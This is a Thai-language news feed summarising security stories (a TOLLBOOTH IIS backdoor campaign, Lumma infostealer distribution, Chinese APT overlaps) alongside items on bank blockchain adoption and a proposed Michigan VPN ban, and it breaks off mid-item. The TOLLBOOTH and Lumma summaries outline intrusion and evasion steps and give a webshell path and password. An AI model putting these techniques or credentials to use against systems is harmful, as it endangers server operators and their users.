ที่เกี่ยวข้อง ➡️ Glowworm (Earth Estries), FamousSparrow ➡️ UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน ➡️ APT41, Blackfly, Grayfly – ใช้ ShadowPad ➡️ REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น ✅ เป้าหมายของการโจมตี ➡️ หน่วยงานรัฐบาลในอเมริกาใต้ ➡️ มหาวิทยาลัยในสหรัฐฯ ➡️ ระบบ SharePoint ที่มีช่องโหว่ ➡️ เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ ➡️ สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    SECURITYONLINE.INFO
    Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage
    Symantec exposed a complex Chinese APT network (Glowworm/UNC5221) deploying Zingdoor and ShadowPad across US/South American targets. The groups abuse DLL sideloading and PetitPotam for credential theft.
    0 Comments 0 Shares 118 Views 0 Reviews
  • “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!”

    Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด

    แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน

    หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456!

    TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย ซึ่งเป็นเทคนิคที่เรียกว่า link farm network

    หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง

    นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ

    การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง

    วิธีการโจมตี
    ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ
    สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server
    ติดตั้ง TOLLBOOTH IIS module เป็น backdoor
    ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ
    ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน

    ความสามารถของ TOLLBOOTH
    มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน
    รองรับการอัปโหลดไฟล์และรันคำสั่ง
    มี endpoint สำหรับ health check, debug และ clean
    มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้
    ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม

    ความสามารถของ HIDDENDRIVER
    ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry
    มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน
    ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process
    ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้

    ขอบเขตของการโจมตี
    พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง
    ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา
    ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing
    พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ

    https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    🕳️ “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!” Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456! TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย ซึ่งเป็นเทคนิคที่เรียกว่า link farm network หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง ✅ วิธีการโจมตี ➡️ ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ ➡️ สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server ➡️ ติดตั้ง TOLLBOOTH IIS module เป็น backdoor ➡️ ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ ➡️ ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน ✅ ความสามารถของ TOLLBOOTH ➡️ มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน ➡️ รองรับการอัปโหลดไฟล์และรันคำสั่ง ➡️ มี endpoint สำหรับ health check, debug และ clean ➡️ มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้ ➡️ ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม ✅ ความสามารถของ HIDDENDRIVER ➡️ ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry ➡️ มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน ➡️ ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process ➡️ ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้ ✅ ขอบเขตของการโจมตี ➡️ พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง ➡️ ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา ➡️ ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing ➡️ พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    SECURITYONLINE.INFO
    Chinese Hackers Exploit Exposed ASP.NET Keys to Deploy TOLLBOOTH IIS Backdoor and Kernel Rootkit
    Elastic exposed Chinese threat actors exploiting public ASP.NET machine keys to deploy TOLLBOOTH IIS backdoor and HIDDENDRIVER kernel rootkit. The malware performs stealthy SEO cloaking.
    0 Comments 0 Shares 128 Views 0 Reviews
  • “Lumma Infostealer กลับมาอีกครั้ง – แพร่ผ่านซอฟต์แวร์เถื่อน ใช้ NSIS, AutoIt และ MEGA Cloud ขโมยข้อมูลทั่วโลก!”

    นักวิจัยจาก Genians Security Center (GSC) พบแคมเปญใหม่ของมัลแวร์ชื่อดัง Lumma Infostealer ที่ใช้เทคนิคซับซ้อนและแพร่กระจายผ่านซอฟต์แวร์เถื่อน โดยใช้เครื่องมืออย่าง NSIS installer, สคริปต์ AutoIt และโฮสต์ไฟล์บน MEGA Cloud เพื่อหลบเลี่ยงการตรวจจับ

    Lumma เป็นมัลแวร์แบบ Malware-as-a-Service (MaaS) ที่ใครก็สามารถซื้อไปใช้ได้ ไม่ต้องมีทักษะเขียนโค้ด แค่จ่ายเงินก็ได้เครื่องมือพร้อมใช้งาน ซึ่งทำให้แฮกเกอร์หน้าใหม่สามารถเปิดแคมเปญโจมตีได้ทันที

    แคมเปญล่าสุดเริ่มจากเว็บไซต์ปลอมที่แจกซอฟต์แวร์เถื่อน เมื่อเหยื่อคลิกดาวน์โหลด จะถูก redirect ไปยังไฟล์ ZIP ที่เข้ารหัสซึ่งมี NSIS installer ชื่อ setup.exe อยู่ข้างใน ตัว installer นี้จะเรียกใช้ AutoIt script ที่ถูก obfuscate ไว้อย่างหนัก และใช้เทคนิค Process Hollowing เพื่อแอบรัน Lumma Infostealer โดยปลอมตัวเป็นไฟล์ธรรมดา

    เมื่อรันสำเร็จ มัลแวร์จะขโมยข้อมูลจากเบราว์เซอร์, อีเมล, VPN, RDP, และ crypto wallets แล้วส่งไปยังเซิร์ฟเวอร์ C2 ที่อยู่ในโดเมน .su ซึ่งเป็นโดเมนที่นิยมใช้ในแคมเปญรัสเซีย

    Lumma ถูกจัดเป็นภัยระดับสูง เพราะเป็นจุดเริ่มต้นของการโจมตีแบบ ransomware และการยึดบัญชี (account takeover) โดยข้อมูลที่ขโมยไปจะถูกขายในตลาดมืดหรือใช้โจมตีองค์กรต่อ

    รายละเอียดแคมเปญ Lumma Infostealer
    ใช้ NSIS installer และ AutoIt script ที่ถูก obfuscate
    แพร่ผ่านไฟล์ซอฟต์แวร์เถื่อนจากเว็บไซต์ปลอม
    ใช้ MEGA Cloud เป็นแหล่งโฮสต์ payload
    ใช้ Process Hollowing เพื่อแอบรันมัลแวร์
    ขโมยข้อมูลจากเบราว์เซอร์, อีเมล, VPN, RDP และ crypto wallets

    ลักษณะของ Lumma Infostealer
    เป็น Malware-as-a-Service (MaaS) ที่ใครก็ซื้อใช้ได้
    ไม่ต้องมีทักษะเขียนโค้ดก็เปิดแคมเปญโจมตีได้
    มี modular design ที่ปรับแต่งได้ตามความต้องการ
    ใช้โดเมน .su สำหรับเซิร์ฟเวอร์ C2
    ข้อมูลที่ขโมยไปถูกขายหรือใช้โจมตีองค์กรต่อ

    เทคนิคการหลบเลี่ยงการตรวจจับ
    ใช้ไฟล์ ZIP ที่เข้ารหัสเพื่อหลบการสแกน
    ใช้ AutoIt script ที่มี dummy code และ ASCII encoding
    ใช้ Process Hollowing เพื่อปลอมตัวเป็นโปรเซสธรรมดา
    เปลี่ยน URL และไฟล์ payload บ่อยเพื่อหลบ blacklist

    https://securityonline.info/lumma-infostealer-maas-campaign-uses-nsis-autoit-and-mega-cloud-to-steal-credentials-via-pirated-software/
    🕵️‍♂️ “Lumma Infostealer กลับมาอีกครั้ง – แพร่ผ่านซอฟต์แวร์เถื่อน ใช้ NSIS, AutoIt และ MEGA Cloud ขโมยข้อมูลทั่วโลก!” นักวิจัยจาก Genians Security Center (GSC) พบแคมเปญใหม่ของมัลแวร์ชื่อดัง Lumma Infostealer ที่ใช้เทคนิคซับซ้อนและแพร่กระจายผ่านซอฟต์แวร์เถื่อน โดยใช้เครื่องมืออย่าง NSIS installer, สคริปต์ AutoIt และโฮสต์ไฟล์บน MEGA Cloud เพื่อหลบเลี่ยงการตรวจจับ Lumma เป็นมัลแวร์แบบ Malware-as-a-Service (MaaS) ที่ใครก็สามารถซื้อไปใช้ได้ ไม่ต้องมีทักษะเขียนโค้ด แค่จ่ายเงินก็ได้เครื่องมือพร้อมใช้งาน ซึ่งทำให้แฮกเกอร์หน้าใหม่สามารถเปิดแคมเปญโจมตีได้ทันที แคมเปญล่าสุดเริ่มจากเว็บไซต์ปลอมที่แจกซอฟต์แวร์เถื่อน เมื่อเหยื่อคลิกดาวน์โหลด จะถูก redirect ไปยังไฟล์ ZIP ที่เข้ารหัสซึ่งมี NSIS installer ชื่อ setup.exe อยู่ข้างใน ตัว installer นี้จะเรียกใช้ AutoIt script ที่ถูก obfuscate ไว้อย่างหนัก และใช้เทคนิค Process Hollowing เพื่อแอบรัน Lumma Infostealer โดยปลอมตัวเป็นไฟล์ธรรมดา เมื่อรันสำเร็จ มัลแวร์จะขโมยข้อมูลจากเบราว์เซอร์, อีเมล, VPN, RDP, และ crypto wallets แล้วส่งไปยังเซิร์ฟเวอร์ C2 ที่อยู่ในโดเมน .su ซึ่งเป็นโดเมนที่นิยมใช้ในแคมเปญรัสเซีย Lumma ถูกจัดเป็นภัยระดับสูง เพราะเป็นจุดเริ่มต้นของการโจมตีแบบ ransomware และการยึดบัญชี (account takeover) โดยข้อมูลที่ขโมยไปจะถูกขายในตลาดมืดหรือใช้โจมตีองค์กรต่อ ✅ รายละเอียดแคมเปญ Lumma Infostealer ➡️ ใช้ NSIS installer และ AutoIt script ที่ถูก obfuscate ➡️ แพร่ผ่านไฟล์ซอฟต์แวร์เถื่อนจากเว็บไซต์ปลอม ➡️ ใช้ MEGA Cloud เป็นแหล่งโฮสต์ payload ➡️ ใช้ Process Hollowing เพื่อแอบรันมัลแวร์ ➡️ ขโมยข้อมูลจากเบราว์เซอร์, อีเมล, VPN, RDP และ crypto wallets ✅ ลักษณะของ Lumma Infostealer ➡️ เป็น Malware-as-a-Service (MaaS) ที่ใครก็ซื้อใช้ได้ ➡️ ไม่ต้องมีทักษะเขียนโค้ดก็เปิดแคมเปญโจมตีได้ ➡️ มี modular design ที่ปรับแต่งได้ตามความต้องการ ➡️ ใช้โดเมน .su สำหรับเซิร์ฟเวอร์ C2 ➡️ ข้อมูลที่ขโมยไปถูกขายหรือใช้โจมตีองค์กรต่อ ✅ เทคนิคการหลบเลี่ยงการตรวจจับ ➡️ ใช้ไฟล์ ZIP ที่เข้ารหัสเพื่อหลบการสแกน ➡️ ใช้ AutoIt script ที่มี dummy code และ ASCII encoding ➡️ ใช้ Process Hollowing เพื่อปลอมตัวเป็นโปรเซสธรรมดา ➡️ เปลี่ยน URL และไฟล์ payload บ่อยเพื่อหลบ blacklist https://securityonline.info/lumma-infostealer-maas-campaign-uses-nsis-autoit-and-mega-cloud-to-steal-credentials-via-pirated-software/
    SECURITYONLINE.INFO
    Lumma Infostealer MaaS Campaign Uses NSIS/AutoIt and MEGA Cloud to Steal Credentials via Pirated Software
    A sophisticated Lumma Infostealer MaaS campaign targets users with pirated software installers. It uses NSIS/AutoIt scripts, Process Hollowing, and MEGA cloud to steal credentials from browsers and crypto wallets.
    0 Comments 0 Shares 81 Views 0 Reviews
  • “จากปฏิเสธสู่การยอมรับ – ทำไมธนาคารใหญ่หันมาใช้ Blockchain จริงจังในปี 2025?”

    เมื่อก่อนธนาคารมอง Blockchain ว่าเป็นเทคโนโลยีเสี่ยงที่เชื่อมโยงกับคริปโตและความผันผวน แต่ในปี 2025 ทุกอย่างเปลี่ยนไป ธนาคารยักษ์ใหญ่อย่าง JPMorgan, HSBC และ Citi ไม่ได้แค่ทดลองใช้ Blockchain อีกต่อไป พวกเขากำลัง “สร้างระบบใหม่” บนเทคโนโลยีนี้จริงจัง

    เหตุผลหลักคือ Blockchain ช่วยแก้ปัญหาเก่า ๆ ที่ธนาคารเจอมานาน เช่น การโอนเงินข้ามประเทศที่ใช้เวลาหลายวัน, ค่าธรรมเนียมสูง, และระบบหลังบ้านที่ซับซ้อนและเปลืองทรัพยากร

    ตัวอย่างที่ชัดเจนคือ JPMorgan ใช้แพลตฟอร์ม Kinexys (ชื่อเดิม Onyx) ที่ประมวลผลธุรกรรมกว่า $1.5 ล้านล้านดอลลาร์ และมีการใช้งานเฉลี่ยวันละ $2 พันล้าน โดยใช้ JPM Coin เพื่อให้ลูกค้าธุรกิจโอนเงินแบบ real-time

    นอกจากเรื่องความเร็ว ยังมีเรื่องต้นทุนและความร่วมมือระหว่างธนาคาร เช่น SWIFT กำลังทดลองระบบ settlement ด้วย Blockchain ร่วมกับกว่า 30 สถาบัน และเครือข่าย Canton Network ที่มี Deutsche Bank และ Goldman Sachs ก็เปิดให้ธนาคารแลกเปลี่ยนสินทรัพย์ tokenized ได้โดยตรง

    ธนาคารยังหันมาใช้ Blockchain ในการจัดการข้อมูลลูกค้า เช่น KYC และการตรวจสอบการฉ้อโกง เพราะระบบนี้มีความโปร่งใสสูง ทุกธุรกรรมมี timestamp และสามารถตรวจสอบย้อนหลังได้ง่าย

    แม้จะยังไม่ใช่ทุกธนาคารที่ใช้ Blockchain เต็มรูปแบบ แต่แนวโน้มชัดเจนว่าเทคโนโลยีนี้กำลังกลายเป็น “โครงสร้างพื้นฐานใหม่” ของโลกการเงิน

    เหตุผลที่ธนาคารหันมาใช้ Blockchain
    ลดเวลาในการโอนเงินข้ามประเทศ
    ลดค่าธรรมเนียมและความผิดพลาด
    เพิ่มความโปร่งใสในการตรวจสอบธุรกรรม
    ใช้กับการจัดการข้อมูลลูกค้า เช่น KYC และ fraud detection
    รองรับการแลกเปลี่ยนสินทรัพย์ tokenized แบบ real-time

    ตัวอย่างการใช้งานจริง
    JPMorgan ใช้ Kinexys และ JPM Coin โอนเงินแบบทันที
    SWIFT ทดลองระบบ settlement ด้วย Blockchain
    Deutsche Bank และ BNP Paribas ใช้ Partior และ Canton Network
    HSBC เปิดบริการ tokenized deposit ในฮ่องกง
    Citi ใช้ smart contract เพื่อเร่งการโอนเงินและ trade finance

    ปัจจัยที่ทำให้ Blockchain น่าใช้มากขึ้น
    ระบบ permissioned ที่ใช้พลังงานต่ำ
    กฎระเบียบที่ชัดเจนขึ้นใน EU และสิงคโปร์
    Stablecoin และ digital token ที่มีเงินสดหนุนหลัง
    ธนาคารกลางกว่า 90% กำลังทดลอง CBDC
    เครื่องมือตรวจสอบ smart contract เพื่อความปลอดภัย

    https://hackread.com/why-banks-embrace-blockchain-once-rejected/
    🏦 “จากปฏิเสธสู่การยอมรับ – ทำไมธนาคารใหญ่หันมาใช้ Blockchain จริงจังในปี 2025?” เมื่อก่อนธนาคารมอง Blockchain ว่าเป็นเทคโนโลยีเสี่ยงที่เชื่อมโยงกับคริปโตและความผันผวน แต่ในปี 2025 ทุกอย่างเปลี่ยนไป ธนาคารยักษ์ใหญ่อย่าง JPMorgan, HSBC และ Citi ไม่ได้แค่ทดลองใช้ Blockchain อีกต่อไป พวกเขากำลัง “สร้างระบบใหม่” บนเทคโนโลยีนี้จริงจัง เหตุผลหลักคือ Blockchain ช่วยแก้ปัญหาเก่า ๆ ที่ธนาคารเจอมานาน เช่น การโอนเงินข้ามประเทศที่ใช้เวลาหลายวัน, ค่าธรรมเนียมสูง, และระบบหลังบ้านที่ซับซ้อนและเปลืองทรัพยากร ตัวอย่างที่ชัดเจนคือ JPMorgan ใช้แพลตฟอร์ม Kinexys (ชื่อเดิม Onyx) ที่ประมวลผลธุรกรรมกว่า $1.5 ล้านล้านดอลลาร์ และมีการใช้งานเฉลี่ยวันละ $2 พันล้าน โดยใช้ JPM Coin เพื่อให้ลูกค้าธุรกิจโอนเงินแบบ real-time นอกจากเรื่องความเร็ว ยังมีเรื่องต้นทุนและความร่วมมือระหว่างธนาคาร เช่น SWIFT กำลังทดลองระบบ settlement ด้วย Blockchain ร่วมกับกว่า 30 สถาบัน และเครือข่าย Canton Network ที่มี Deutsche Bank และ Goldman Sachs ก็เปิดให้ธนาคารแลกเปลี่ยนสินทรัพย์ tokenized ได้โดยตรง ธนาคารยังหันมาใช้ Blockchain ในการจัดการข้อมูลลูกค้า เช่น KYC และการตรวจสอบการฉ้อโกง เพราะระบบนี้มีความโปร่งใสสูง ทุกธุรกรรมมี timestamp และสามารถตรวจสอบย้อนหลังได้ง่าย แม้จะยังไม่ใช่ทุกธนาคารที่ใช้ Blockchain เต็มรูปแบบ แต่แนวโน้มชัดเจนว่าเทคโนโลยีนี้กำลังกลายเป็น “โครงสร้างพื้นฐานใหม่” ของโลกการเงิน ✅ เหตุผลที่ธนาคารหันมาใช้ Blockchain ➡️ ลดเวลาในการโอนเงินข้ามประเทศ ➡️ ลดค่าธรรมเนียมและความผิดพลาด ➡️ เพิ่มความโปร่งใสในการตรวจสอบธุรกรรม ➡️ ใช้กับการจัดการข้อมูลลูกค้า เช่น KYC และ fraud detection ➡️ รองรับการแลกเปลี่ยนสินทรัพย์ tokenized แบบ real-time ✅ ตัวอย่างการใช้งานจริง ➡️ JPMorgan ใช้ Kinexys และ JPM Coin โอนเงินแบบทันที ➡️ SWIFT ทดลองระบบ settlement ด้วย Blockchain ➡️ Deutsche Bank และ BNP Paribas ใช้ Partior และ Canton Network ➡️ HSBC เปิดบริการ tokenized deposit ในฮ่องกง ➡️ Citi ใช้ smart contract เพื่อเร่งการโอนเงินและ trade finance ✅ ปัจจัยที่ทำให้ Blockchain น่าใช้มากขึ้น ➡️ ระบบ permissioned ที่ใช้พลังงานต่ำ ➡️ กฎระเบียบที่ชัดเจนขึ้นใน EU และสิงคโปร์ ➡️ Stablecoin และ digital token ที่มีเงินสดหนุนหลัง ➡️ ธนาคารกลางกว่า 90% กำลังทดลอง CBDC ➡️ เครื่องมือตรวจสอบ smart contract เพื่อความปลอดภัย https://hackread.com/why-banks-embrace-blockchain-once-rejected/
    HACKREAD.COM
    Why Banks Are Embracing Blockchain They Once Rejected
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 182 Views 0 Reviews
  • “สหรัฐฯ เสนอแบน VPN – นักเคลื่อนไหวทั่วโลกลุกฮือจัด ‘VPN Day of Action’ ต้านกฎหมายเซ็นเซอร์”

    ในเดือนกันยายน 2025 รัฐมิชิแกนของสหรัฐฯ ได้เสนอร่างกฎหมายชื่อว่า Anticorruption of Public Morals Act ซึ่งมีเนื้อหาห้ามการเผยแพร่เนื้อหาที่ถูกมองว่า “บ่อนทำลายศีลธรรม” เช่น ภาพคนข้ามเพศ, สื่อลามก, ASMR และภาพกราฟิกต่าง ๆ พร้อมบทลงโทษทั้งปรับและจำคุกสำหรับผู้โพสต์และแพลตฟอร์มที่เผยแพร่

    แต่ที่น่ากังวลกว่านั้นคือ กฎหมายนี้ยังเสนอให้ แบนเครื่องมือหลบเลี่ยงการเซ็นเซอร์ เช่น VPN, proxy และ encrypted tunneling ซึ่งเป็นเครื่องมือสำคัญในการปกป้องความเป็นส่วนตัวและเข้าถึงข้อมูลในประเทศที่มีการควบคุมเนื้อหา

    แม้กฎหมายนี้จะยังไม่ผ่าน แต่ก็จุดกระแสต่อต้านอย่างรุนแรง โดยองค์กร Fight for the Future ได้จัดกิจกรรม VPN Day of Action ซึ่งมีผู้ร่วมลงชื่อในจดหมายเปิดผนึกมากกว่า 15,000 คน เพื่อเรียกร้องให้รัฐต่าง ๆ ปกป้องสิทธิในการใช้ VPN

    นักเคลื่อนไหวชี้ว่า VPN ไม่ใช่แค่เครื่องมือหลบเลี่ยงการเซ็นเซอร์ แต่ยังเป็นเครื่องมือสำคัญในการรักษาความปลอดภัยออนไลน์ โดยเฉพาะในยุคที่การโจมตีทางไซเบอร์จากรัฐและกลุ่มอาชญากรรมเพิ่มขึ้นอย่างต่อเนื่อง

    ตัวอย่างเช่น ในเดือนกันยายน 2025 นักเคลื่อนไหวในเนปาลใช้ VPN เพื่อจัดการประท้วงผ่านโซเชียลมีเดีย แม้รัฐบาลจะพยายามบล็อกแพลตฟอร์มเหล่านั้นก็ตาม

    รายละเอียดร่างกฎหมายในมิชิแกน
    ชื่อว่า Anticorruption of Public Morals Act
    ห้ามเผยแพร่เนื้อหาที่ถูกมองว่า “บ่อนทำลายศีลธรรม”
    รวมถึงภาพคนข้ามเพศ, สื่อลามก, ASMR และภาพกราฟิก
    เสนอแบน VPN, proxy และ encrypted tunneling
    มีบทลงโทษทั้งปรับและจำคุกสำหรับผู้โพสต์และแพลตฟอร์ม

    การตอบโต้จากนักเคลื่อนไหว
    องค์กร Fight for the Future จัด VPN Day of Action
    มีผู้ร่วมลงชื่อในจดหมายเปิดผนึกมากกว่า 15,000 คน
    เรียกร้องให้รัฐต่าง ๆ ปกป้องสิทธิในการใช้ VPN
    ชี้ว่า VPN เป็นเครื่องมือสำคัญในการรักษาความปลอดภัยและเสรีภาพ
    ยกตัวอย่างการใช้ VPN ในการจัดการประท้วงในเนปาล

    บริบททางการเมืองและเทคโนโลยี
    กฎหมายนี้สะท้อนแนวโน้มการเซ็นเซอร์ที่เพิ่มขึ้นในสหรัฐฯ และยุโรป
    สหราชอาณาจักรก็เคยเสนอจำกัด VPN หลังยอดดาวน์โหลดพุ่ง
    การแบน VPN อาจทำให้สหรัฐฯ ถูกเปรียบเทียบกับรัฐเผด็จการ เช่น รัสเซีย, อิหร่าน, เกาหลีเหนือ
    VPN เป็นเครื่องมือสำคัญในโลกไซเบอร์ที่เต็มไปด้วยภัยคุกคาม

    https://www.slashgear.com/1998517/us-states-vpn-ban-protests-day-of-action/
    🛡️ “สหรัฐฯ เสนอแบน VPN – นักเคลื่อนไหวทั่วโลกลุกฮือจัด ‘VPN Day of Action’ ต้านกฎหมายเซ็นเซอร์” ในเดือนกันยายน 2025 รัฐมิชิแกนของสหรัฐฯ ได้เสนอร่างกฎหมายชื่อว่า Anticorruption of Public Morals Act ซึ่งมีเนื้อหาห้ามการเผยแพร่เนื้อหาที่ถูกมองว่า “บ่อนทำลายศีลธรรม” เช่น ภาพคนข้ามเพศ, สื่อลามก, ASMR และภาพกราฟิกต่าง ๆ พร้อมบทลงโทษทั้งปรับและจำคุกสำหรับผู้โพสต์และแพลตฟอร์มที่เผยแพร่ แต่ที่น่ากังวลกว่านั้นคือ กฎหมายนี้ยังเสนอให้ แบนเครื่องมือหลบเลี่ยงการเซ็นเซอร์ เช่น VPN, proxy และ encrypted tunneling ซึ่งเป็นเครื่องมือสำคัญในการปกป้องความเป็นส่วนตัวและเข้าถึงข้อมูลในประเทศที่มีการควบคุมเนื้อหา แม้กฎหมายนี้จะยังไม่ผ่าน แต่ก็จุดกระแสต่อต้านอย่างรุนแรง โดยองค์กร Fight for the Future ได้จัดกิจกรรม VPN Day of Action ซึ่งมีผู้ร่วมลงชื่อในจดหมายเปิดผนึกมากกว่า 15,000 คน เพื่อเรียกร้องให้รัฐต่าง ๆ ปกป้องสิทธิในการใช้ VPN นักเคลื่อนไหวชี้ว่า VPN ไม่ใช่แค่เครื่องมือหลบเลี่ยงการเซ็นเซอร์ แต่ยังเป็นเครื่องมือสำคัญในการรักษาความปลอดภัยออนไลน์ โดยเฉพาะในยุคที่การโจมตีทางไซเบอร์จากรัฐและกลุ่มอาชญากรรมเพิ่มขึ้นอย่างต่อเนื่อง ตัวอย่างเช่น ในเดือนกันยายน 2025 นักเคลื่อนไหวในเนปาลใช้ VPN เพื่อจัดการประท้วงผ่านโซเชียลมีเดีย แม้รัฐบาลจะพยายามบล็อกแพลตฟอร์มเหล่านั้นก็ตาม ✅ รายละเอียดร่างกฎหมายในมิชิแกน ➡️ ชื่อว่า Anticorruption of Public Morals Act ➡️ ห้ามเผยแพร่เนื้อหาที่ถูกมองว่า “บ่อนทำลายศีลธรรม” ➡️ รวมถึงภาพคนข้ามเพศ, สื่อลามก, ASMR และภาพกราฟิก ➡️ เสนอแบน VPN, proxy และ encrypted tunneling ➡️ มีบทลงโทษทั้งปรับและจำคุกสำหรับผู้โพสต์และแพลตฟอร์ม ✅ การตอบโต้จากนักเคลื่อนไหว ➡️ องค์กร Fight for the Future จัด VPN Day of Action ➡️ มีผู้ร่วมลงชื่อในจดหมายเปิดผนึกมากกว่า 15,000 คน ➡️ เรียกร้องให้รัฐต่าง 